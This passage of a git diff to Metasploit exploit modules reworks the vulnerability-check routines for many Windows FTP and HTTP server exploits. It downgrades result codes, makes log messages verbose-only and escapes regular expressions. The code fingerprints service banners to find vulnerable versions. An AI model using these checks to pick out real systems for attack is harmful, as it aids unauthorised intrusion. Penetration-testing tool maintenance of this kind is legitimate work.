=~ /BigFoolCat/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb b/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb index 4e45a2818d..6368dcbbef 100644 --- a/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if (banner =~ /BigFoolCat/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/freefloatftp_user.rb b/modules/exploits/windows/ftp/freefloatftp_user.rb index 959c94b5ed..a85fd0f6e5 100644 --- a/modules/exploits/windows/ftp/freefloatftp_user.rb +++ b/modules/exploits/windows/ftp/freefloatftp_user.rb @@ -57,6 +57,7 @@ class Metasploit4 < Msf::Exploit::Remote connect disconnect if (banner =~ /FreeFloat/) + # Software is never updated, so if you run this you're f*cked. return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe diff --git a/modules/exploits/windows/ftp/freefloatftp_wbem.rb b/modules/exploits/windows/ftp/freefloatftp_wbem.rb index 27718f7679..a035752d21 100644 --- a/modules/exploits/windows/ftp/freefloatftp_wbem.rb +++ b/modules/exploits/windows/ftp/freefloatftp_wbem.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if banner =~ /FreeFloat/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/freeftpd_pass.rb b/modules/exploits/windows/ftp/freeftpd_pass.rb index 1c8711caa6..285b4dd012 100644 --- a/modules/exploits/windows/ftp/freeftpd_pass.rb +++ b/modules/exploits/windows/ftp/freeftpd_pass.rb @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote # All versions including and above version 1.0 report "220 Hello, I'm freeFTPd 1.0" # when banner grabbing. if banner =~ /freeFTPd 1\.0/ - return Exploit::CheckCode::Detected + return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe diff --git a/modules/exploits/windows/ftp/freeftpd_user.rb b/modules/exploits/windows/ftp/freeftpd_user.rb index db8e0d7a3c..ef572effe0 100644 --- a/modules/exploits/windows/ftp/freeftpd_user.rb +++ b/modules/exploits/windows/ftp/freeftpd_user.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote connect disconnect if (banner =~ /freeFTPd 1\.0/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/goldenftp_pass_bof.rb b/modules/exploits/windows/ftp/goldenftp_pass_bof.rb index d773ba4cc8..cc334f2643 100644 --- a/modules/exploits/windows/ftp/goldenftp_pass_bof.rb +++ b/modules/exploits/windows/ftp/goldenftp_pass_bof.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote def check connect disconnect - print_status("FTP Banner: #{banner}".strip) + vprint_status("FTP Banner: #{banner}".strip) if banner =~ /Golden FTP Server ready v(4\.\d{2})/ and $1 == "4.70" return Exploit::CheckCode::Appears else diff --git a/modules/exploits/windows/ftp/httpdx_tolog_format.rb b/modules/exploits/windows/ftp/httpdx_tolog_format.rb index a1263b6f66..844a06de10 100644 --- a/modules/exploits/windows/ftp/httpdx_tolog_format.rb +++ b/modules/exploits/windows/ftp/httpdx_tolog_format.rb @@ -125,9 +125,9 @@ For now, that will have to be done manually. def check connect disconnect - print_status("FTP Banner: #{banner}".strip) + vprint_status("FTP Banner: #{banner}".strip) if banner =~ /httpdx.*\(Win32\)/ - return Exploit::CheckCode::Appears + return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/netterm_netftpd_user.rb b/modules/exploits/windows/ftp/netterm_netftpd_user.rb index 1fd6e91a82..4e756c2a11 100644 --- a/modules/exploits/windows/ftp/netterm_netftpd_user.rb +++ b/modules/exploits/windows/ftp/netterm_netftpd_user.rb @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote connect disconnect if (banner =~ /NetTerm FTP server/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/open_ftpd_wbem.rb b/modules/exploits/windows/ftp/open_ftpd_wbem.rb index 87a0fa43d3..93fad47728 100644 --- a/modules/exploits/windows/ftp/open_ftpd_wbem.rb +++ b/modules/exploits/windows/ftp/open_ftpd_wbem.rb @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if banner =~ /\*\* Welcome on \*\*/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Detected else return Exploit::CheckCode::Unknown end diff --git a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb index 89996329c8..35e0d31ea7 100644 --- a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb +++ b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote connect disconnect if (banner =~ /9\.2\.0\.1\.0/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb index 38fbb0ee38..6120334331 100644 --- a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb +++ b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote connect disconnect if (banner =~ /9\.2\.0\.1\.0/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/pcman_stor.rb b/modules/exploits/windows/ftp/pcman_stor.rb index e87af145c6..a8e3474e1d 100644 --- a/modules/exploits/windows/ftp/pcman_stor.rb +++ b/modules/exploits/windows/ftp/pcman_stor.rb @@ -60,10 +60,10 @@ class Metasploit3 < Msf::Exploit::Remote if c and banner =~ /220 PCMan's FTP Server 2\.0/ # Auth is required to exploit - print_status("Able to authenticate, and banner shows the vulnerable version") - return Exploit::CheckCode::Vulnerable + vprint_status("Able to authenticate, and banner shows the vulnerable version") + return Exploit::CheckCode::Appears elsif not c and banner =~ /220 PCMan's FTP Server 2\.0/ - print_status("Unable to authenticate, but banner shows the vulnerable version") + vprint_status("Unable to authenticate, but banner shows the vulnerable version") # Auth failed, but based on version maybe the target is vulnerable return Exploit::CheckCode::Appears end diff --git a/modules/exploits/windows/ftp/ricoh_dl_bof.rb b/modules/exploits/windows/ftp/ricoh_dl_bof.rb index 08406d38eb..9054489c4a 100644 --- a/modules/exploits/windows/ftp/ricoh_dl_bof.rb +++ b/modules/exploits/windows/ftp/ricoh_dl_bof.rb @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote connect disconnect if banner =~ /220 DSC ftpd 1\.0 FTP Server/ - return Exploit::CheckCode::Detected + return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/sami_ftpd_user.rb b/modules/exploits/windows/ftp/sami_ftpd_user.rb index c6a5546220..f6d9bd49f0 100644 --- a/modules/exploits/windows/ftp/sami_ftpd_user.rb +++ b/modules/exploits/windows/ftp/sami_ftpd_user.rb @@ -74,8 +74,8 @@ class Metasploit3 < Msf::Exploit::Remote banner = sock.get(-1,3) disconnect - if (banner =~ /Sami FTP Server 2.0.2/) - return Exploit::CheckCode::Vulnerable + if (banner =~ /Sami FTP Server 2\.0\.2/) + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/servu_chmod.rb b/modules/exploits/windows/ftp/servu_chmod.rb index 51b79cd9b9..d02f862d9f 100644 --- a/modules/exploits/windows/ftp/servu_chmod.rb +++ b/modules/exploits/windows/ftp/servu_chmod.rb @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if (banner =~ /Serv-U FTP Server v((4.(0|1))|3.\d)/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/servu_mdtm.rb b/modules/exploits/windows/ftp/servu_mdtm.rb index 42a243fafb..070c3f348e 100644 --- a/modules/exploits/windows/ftp/servu_mdtm.rb +++ b/modules/exploits/windows/ftp/servu_mdtm.rb @@ -96,31 +96,31 @@ class Metasploit3 < Msf::Exploit::Remote case banner when /Serv-U FTP Server v4\.1/ - print_status('Found version 4.1.0.3, exploitable') - return Exploit::CheckCode::Vulnerable - - when /Serv-U FTP Server v5\.0/ - print_status('Found version 5.0.0.0 (exploitable) or 5.0.0.4 (not), try it!'); + vprint_status('Found version 4.1.0.3, exploitable') return Exploit::CheckCode::Appears + when /Serv-U FTP Server v5\.0/ + vprint_status('Found version 5! 5.0.0.0 may be exploitable, but not 5.0.0.4'); + return Exploit::CheckCode::Detected + when /Serv-U FTP Server v4\.0/ - print_status('Found version 4.0.0.4 or 4.1.0.0, additional check.'); + vprint_status('Found version 4.0.0.4 or 4.1.0.0, additional check.'); send_user(datastore['USER']) send_pass(datastore['PASS']) if (double_ff?()) - print_status('Found version 4.0.0.4, exploitable'); - return Exploit::CheckCode::Vulnerable + vprint_status('Found version 4.0.0.4, exploitable'); + return Exploit::CheckCode::Appears else - print_status('Found version 4.1.0.0, exploitable'); - return Exploit::CheckCode::Vulnerable + vprint_status('Found version 4.1.0.0, exploitable'); + return Exploit::CheckCode::Appears end - when /Serv-U FTP Server/ - print_status('Found an unknown version, try it!'); + when /Serv\-U FTP Server/ + vprint_status('Found an unknown version, try it!'); return Exploit::CheckCode::Detected else - print_status('We could not recognize the server banner') + vprint_status('We could not recognize the server banner') return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/turboftp_port.rb b/modules/exploits/windows/ftp/turboftp_port.rb index 986745dbba..f77e5c41b7 100644 --- a/modules/exploits/windows/ftp/turboftp_port.rb +++ b/modules/exploits/windows/ftp/turboftp_port.rb @@ -63,9 +63,9 @@ class Metasploit3 < Msf::Exploit::Remote connect disconnect if (banner =~ /1\.30\.823/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears elsif (banner =~ /1\.30\.826/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb index 49a66b4f45..412789b02e 100644 --- a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb +++ b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb @@ -98,9 +98,9 @@ class Metasploit3 < Msf::Exploit::Remote def check connect disconnect - print_status("FTP Banner: #{banner}".strip) + vprint_status("FTP Banner: #{banner}".strip) if banner =~ /\(vftpd .*\)/ - return Exploit::CheckCode::Appears + return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb b/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb index 61e8d942bd..6b3f186759 100644 --- a/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb +++ b/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote connect disconnect if (banner =~ /5\.0\.3/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb b/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb index f6e6daa27c..126618beaa 100644 --- a/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb +++ b/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb @@ -47,8 +47,8 @@ class Metasploit3 < Msf::Exploit::Remote def check connect disconnect - if (banner =~ /WS_FTP Server 5.0.5/) - return Exploit::CheckCode::Vulnerable + if (banner =~ /WS_FTP Server 5\.0\.5/) + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/xlink_server.rb b/modules/exploits/windows/ftp/xlink_server.rb index 2d87b3d703..12e7a44290 100644 --- a/modules/exploits/windows/ftp/xlink_server.rb +++ b/modules/exploits/windows/ftp/xlink_server.rb @@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if (banner =~ /XLINK FTP Server/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/games/ut2004_secure.rb b/modules/exploits/windows/games/ut2004_secure.rb index abef347ad2..509bb4c411 100644 --- a/modules/exploits/windows/games/ut2004_secure.rb +++ b/modules/exploits/windows/games/ut2004_secure.rb @@ -97,19 +97,19 @@ class Metasploit3 < Msf::Exploit::Remote return end - print_status("Detected Unreal Tournament Server Version: #{vers}") + vprint_status("Detected Unreal Tournament Server Version: #{vers}") if (vers =~ /^(3120|3186|3204)$/) - print_status("This system appears to be exploitable") + vprint_status("This system appears to be exploitable") return Exploit::CheckCode::Appears end if (vers =~ /^(2...)$/) - print_status("This system appears to be running UT2003") + vprint_status("This system appears to be running UT2003") return Exploit::CheckCode::Detected end - print_status("This system appears to be patched") + vprint_status("This system appears to be patched") return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/http/altn_securitygateway.rb b/modules/exploits/windows/http/altn_securitygateway.rb index a1bdc56051..2df56e665a 100644 --- a/modules/exploits/windows/http/altn_securitygateway.rb +++ b/modules/exploits/windows/http/altn_securitygateway.rb @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote def check if auto_target - Exploit::CheckCode::Vulnerable + Exploit::CheckCode::Appears end Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/http/apache_chunked.rb b/modules/exploits/windows/http/apache_chunked.rb index 1b9c05d237..07a3e8a1c9 100644 --- a/modules/exploits/windows/http/apache_chunked.rb +++ b/modules/exploits/windows/http/apache_chunked.rb @@ -156,8 +156,8 @@ class Metasploit3 < Msf::Exploit::Remote def check response = send_request_raw({'uri' => '/'}, 5) if response.nil? - print_status("No response to request") - return Exploit::CheckCode::Safe + vprint_status("No response to request") + return Exploit::CheckCode::Unknown end http_fingerprint({ :response => response }) # Custom Server header matching @@ -166,24 +166,20 @@ class Metasploit3 < Msf::Exploit::Remote case response['Server'] when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22" - print_status("This looks like an Oracle 8.1.7 Apache service (one-shot only)") + vprint_status("This looks like an Oracle 8.1.7 Apache service (one-shot only)") when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.24" - print_status("This looks like an Oracle 9.1.0 Apache service (multiple tries allowed)") + vprint_status("This looks like an Oracle 9.1.0 Apache service (multiple tries allowed)") when "Oracle HTTP Server Powered by Apache/1.3.22 (Win32) mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25" - print_status("This looks like an Oracle 9.2.0 Apache service (multiple tries allowed)") + vprint_status("This looks like an Oracle 9.2.0 Apache service (multiple tries allowed)") when /IBM_HTTP_SERVER\/1\.3\.(19\.[3-9]|2[0-9]\.)/ - print_status("IBM backported the patch, this system is not vulnerable") + vprint_status("IBM backported the patch, this system is not vulnerable") code = Exploit::CheckCode::Safe when /Apache(-AdvancedExtranetServer)?\/(1\.([0-2]\.[0-9]|3\.([0-9][^0-9]|[0-1][0-9]|2[0-5]))|2\.0.([0-9][^0-9]|[0-2][0-9]|3[0-8]))/ else code = Exploit::CheckCode::Safe end - if code == Exploit::CheckCode::Appears - print_status("Vulnerable server: #{response['Server']}") - else - print_status("Server is probably not vulnerable: #{response['Server']}") - end + vprint_status("Server: #{response['Server']}") return code end diff --git a/modules/exploits/windows/http/apache_modjk_overflow.rb b/modules/exploits/windows/http/apache_modjk_overflow.rb index c1ffa289ee..b8f8d6c4ed 100644 --- a/modules/exploits/windows/http/apache_modjk_overflow.rb +++ b/modules/exploits/windows/http/apache_modjk_overflow.rb @@ -60,8 +60,8 @@ class Metasploit3 < Msf::Exploit::Remote resp = sock.get_once disconnect - if (resp and (m = resp.match(/Server: Apache\/(.*) \(Win32\)(.*) mod_jk\/1.2.20/))) then - print_status("Apache version detected : #{m[1]}") + if (resp and (m = resp.match(/Server: Apache\/(.*) \(Win32\)(.*) mod_jk\/1\.2\.20/))) then + vprint_status("Apache version detected : #{m[1]}") return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe diff --git a/modules/exploits/windows/http/badblue_ext_overflow.rb b/modules/exploits/windows/http/badblue_ext_overflow.rb index 290fea3f54..bbf9ac4435 100644 --- a/modules/exploits/windows/http/badblue_ext_overflow.rb +++ b/modules/exploits/windows/http/badblue_ext_overflow.rb @@ -52,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote def check info = http_fingerprint # check method if (info =~ /BadBlue\/2\.5/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/http/bea_weblogic_post_bof.rb b/modules/exploits/windows/http/bea_weblogic_post_bof.rb index a86071c0c2..c3b57dcdaf 100644 --- a/modules/exploits/windows/http/bea_weblogic_post_bof.rb +++ b/modules/exploits/windows/http/bea_weblogic_post_bof.rb @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote case fingerprint when /Version found/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears when /BEA WebLogic connector vulnerable/ return Exploit::CheckCode::Appears when /BEA WebLogic connector undefined/ diff --git a/modules/exploits/windows/http/cyclope_ess_sqli.rb b/modules/exploits/windows/http/cyclope_ess_sqli.rb index 4e415858c6..7c9ee042fe 100644 --- a/modules/exploits/windows/http/cyclope_ess_sqli.rb +++ b/modules/exploits/windows/http/cyclope_ess_sqli.rb @@ -60,17 +60,15 @@ class Metasploit3 < Msf::Exploit::Remote path = File.dirname("#{target_uri.path}/.") b64_version = get_version(path) if b64_version.empty? - print_error("#{peer} - Unable to determine the version number") + vprint_error("#{peer} - Unable to determine the version number") else b64_version = Rex::Text.decode_base64(b64_version) if b64_version =~ /^[0-6]\.1/ - return Exploit::CheckCode::Vulnerable - else - return Exploit::CheckCode::Safe + return Exploit::CheckCode::Appears end end - return Exploit::CheckCode::Unknown + return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/http/desktopcentral_file_upload.rb b/modules/exploits/windows/http/desktopcentral_file_upload.rb index d790b28ccb..7ddae4d011 100644 --- a/modules/exploits/windows/http/desktopcentral_file_upload.rb +++ b/modules/exploits/windows/http/desktopcentral_file_upload.rb @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote build = $1 print_status("Manage Desktop Central 8 build #{build} found") if build < "80293" - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/http/easyftp_list.rb b/modules/exploits/windows/http/easyftp_list.rb index bd72a06f5c..dda0bdf929 100644 --- a/modules/exploits/windows/http/easyftp_list.rb +++ b/modules/exploits/windows/http/easyftp_list.rb @@ -77,8 +77,8 @@ class Metasploit3 < Msf::Exploit::Remote def check info = http_fingerprint # check method - if info and (info =~ /Easy-Web Server\//) - return Exploit::CheckCode::Vulnerable + if info and (info =~ /Easy\-Web Server\//) + return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/http/hp_imc_bims_upload.rb b/modules/exploits/windows/http/hp_imc_bims_upload.rb index 4766b4e4a6..334185a104 100644 --- a/modules/exploits/windows/http/hp_imc_bims_upload.rb +++ b/modules/exploits/windows/http/hp_imc_bims_upload.rb @@ -61,12 +61,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res.nil? - print_error("Unable to determine, because the request timed out.") + vprint_error("Unable to determine, because the request timed out.") return Exploit::CheckCode::Unknown end if res.code == 200 and res.headers['Content-Type'] =~ /application\/doc/ and res.body =~ /com\.h3c\.imc\.bims\.acs\.server\.UploadServlet/ - return Exploit::CheckCode::Vulnerable + vprint_status("Upload interface found. Must be tested to verify vulnerable state.") + return Exploit::CheckCode::Appears elsif res.code == 405 and res.message =~ /Method Not Allowed/ return Exploit::CheckCode::Appears end diff --git a/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb b/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb index e9e4017905..45369d96d4 100644 --- a/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb +++ b/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb @@ -105,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote depth = datastore['DEPTH'] install_path = datastore['INSTALLPATH'] - print_status("#{peer} - Detecting tomcat version...") + vprint_status("#{peer} - Detecting tomcat version...") tomcat_version = get_tomcat_version if tomcat_version @@ -118,19 +118,19 @@ class Metasploit3 < Msf::Exploit::Remote res = read_file(depth, location, "index.jsp") if res and res.code == 200 and res.body.to_s =~ /HP Service Emulation/ - print_good("#{peer} - Traversal exists and parameters are correct...") + vprint_good("#{peer} - Traversal exists and parameters are correct...") return Exploit::CheckCode::Vulnerable elsif res and res.code == 500 and res.body.to_s =~ /FileNotFoundException/ - print_warning("#{peer} - Traversal appears to exist, try adjusting parameters DEPTH and INSTALLPATH...") + vprint_warning("#{peer} - Traversal appears to exist, try adjusting parameters DEPTH and INSTALLPATH...") return Exploit::CheckCode::Appears else - print_status("#{peer} - Failed to verify the directory traversal...") + vprint_status("#{peer} - Failed to verify the directory traversal...") end else - print_error("#{peer} - Tomcat version not detected...") + vprint_error("#{peer} - Tomcat version not detected...") end - print_status("#{peer} - Checking if the vulnerable web service and method exist...") + vprint_status("#{peer} - Checking if the vulnerable web service and method exist...") res = send_request_cgi({ 'uri' => normalize_uri('ServiceEmulation', 'services', 'EmulationAdmin'), 'vars_get' => { 'wsdl' => 1 } diff --git a/modules/exploits/windows/http/hp_nnm_ovas.rb b/modules/exploits/windows/http/hp_nnm_ovas.rb index c2f655aa13..86e4ba4890 100644 --- a/modules/exploits/windows/http/hp_nnm_ovas.rb +++ b/modules/exploits/windows/http/hp_nnm_ovas.rb @@ -183,11 +183,11 @@ class Metasploit3 < Msf::Exploit::Remote resp = send_request_raw({'uri' => '/topology/home'}, 5) if resp.nil? - print_status("No response to request") - return Exploit::CheckCode::Safe + vprint_status("No response to request") + return Exploit::CheckCode::Unknown end - if (resp.body =~ /NNM Release B.07.53/ || resp.body =~ /NNM Release B.07.52/ || resp.body =~ /NNM Release B.07.51/) + if (resp.body =~ /NNM Release B\.07\.53/ || resp.body =~ /NNM Release B\.07\.52/ || resp.body =~ /NNM Release B\.07\.51/) return Exploit::CheckCode::Appears end diff --git a/modules/exploits/windows/http/httpdx_handlepeer.rb b/modules/exploits/windows/http/httpdx_handlepeer.rb index ddc21fc8d5..157598b3e9 100644 --- a/modules/exploits/windows/http/httpdx_handlepeer.rb +++ b/modules/exploits/windows/http/httpdx_handlepeer.rb @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote def check info = http_fingerprint # check method if info and (info =~ /httpdx\/(.*) \(Win32\)/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/http/httpdx_tolog_format.rb b/modules/exploits/windows/http/httpdx_tolog_format.rb index ad74759f42..5569903845 100644 --- a/modules/exploits/windows/http/httpdx_tolog_format.rb +++ b/modules/exploits/windows/http/httpdx_tolog_format.rb @@ -137,7 +137,7 @@ For now, that will have to be done manually. if version print_status("HTTPDX version detected : #{version}") if (version =~ /1\.4/) or (version == "1.5") - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end end Exploit::CheckCode::Safe diff --git a/modules/exploits/windows/http/intrasrv_bof.rb b/modules/exploits/windows/http/intrasrv_bof.rb index 71cbf47bb7..c7bb9bd174 100644 --- a/modules/exploits/windows/http/intrasrv_bof.rb +++ b/modules/exploits/windows/http/intrasrv_bof.rb @@ -73,8 +73,8 @@ class Metasploit3 < Msf::Exploit::Remote sock.put("GET / HTTP/1.0\r\n\r\n") res = sock.get_once - if res =~ /intrasrv 1.0/ - return Exploit::CheckCode::Vulnerable + if res =~ /intrasrv 1\.0/ + return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/http/kolibri_http.rb b/modules/exploits/windows/http/kolibri_http.rb index 43d201dbcb..aeb76201d1 100644 --- a/modules/exploits/windows/http/kolibri_http.rb +++ b/modules/exploits/windows/http/kolibri_http.rb @@ -50,7 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote def check info = http_fingerprint if info and (info =~ /kolibri-2\.0/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/http/mailenable_auth_header.rb b/modules/exploits/windows/http/mailenable_auth_header.rb index a695efa0b7..083a250014 100644 --- a/modules/exploits/windows/http/mailenable_auth_header.rb +++ b/modules/exploits/windows/http/mailenable_auth_header.rb @@ -48,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote def check info = http_fingerprint # check method if (info =~ /MailEnable/) - return Exploit::CheckCode::Appears + return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/http/mcafee_epolicy_source.rb b/modules/exploits/windows/http/mcafee_epolicy_source.rb index 1bb9a52884..29f338de3f 100644 --- a/modules/exploits/windows/http/mcafee_epolicy_source.rb +++ b/modules/exploits/windows/http/mcafee_epolicy_source.rb @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote banner = sock.get(-1,3) - if (banner =~ /Spipe\/1.0/) + if (banner =~ /Spipe\/1\.0/) return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb b/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb index 3cfbb9a2a6..582bf2475f 100644 --- a/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb +++ b/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb @@ -72,9 +72,10 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if (banner =~ /WDaemon\/6\.8\.[0-5]/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end - return Exploit::CheckCode::Safe + + return Exploit::CheckCode::Safe end def exploit diff --git a/modules/exploits/windows/http/miniweb_upload_wbem.rb b/modules/exploits/windows/http/miniweb_upload_wbem.rb index 8e5a2fb904..c1f0650c45 100644 --- a/modules/exploits/windows/http/miniweb_upload_wbem.rb +++ b/modules/exploits/windows/http/miniweb_upload_wbem.rb @@ -71,7 +71,8 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => uri }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE - fail_with(Failure::Unreachable, "#{peer} - Connection failed") + vprint_error("Connection failed") + return Exploit::CheckCode::Unknown end if !res or res.headers['Server'].empty? @@ -80,8 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Detected end - return Exploit::CheckCode::Unknown - + return Exploit::CheckCode::Safe end def upload(filename, filedata) diff --git a/modules/exploits/windows/http/navicopa_get_overflow.rb b/modules/exploits/windows/http/navicopa_get_overflow.rb index d3b156d697..f0c62c0ef6 100644 --- a/modules/exploits/windows/http/navicopa_get_overflow.rb +++ b/modules/exploits/windows/http/navicopa_get_overflow.rb @@ -60,8 +60,8 @@ class Metasploit3 < Msf::Exploit::Remote resp = sock.get_once disconnect - if (resp =~ /2.01 11th September/) - return Exploit::CheckCode::Vulnerable + if (resp =~ /2\.01 11th September/) + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/http/netdecision_http_bof.rb b/modules/exploits/windows/http/netdecision_http_bof.rb index 08710c0659..0bd10a55d8 100644 --- a/modules/exploits/windows/http/netdecision_http_bof.rb +++ b/modules/exploits/windows/http/netdecision_http_bof.rb @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_cgi({'uri'=>'/'}) banner = res.headers['Server'] if banner =~ /NetDecision\-HTTP\-Server\/1\.0/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/http/novell_mdm_lfi.rb b/modules/exploits/windows/http/novell_mdm_lfi.rb index 584055c214..545ff7152a 100644 --- a/modules/exploits/windows/http/novell_mdm_lfi.rb +++ b/modules/exploits/windows/http/novell_mdm_lfi.rb @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown elsif v =~ /^2\.6\.[01]/ or v =~ /^2\.7\.0/ # Conditions based on OSVDB info - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/windows/http/oracle9i_xdb_pass.rb 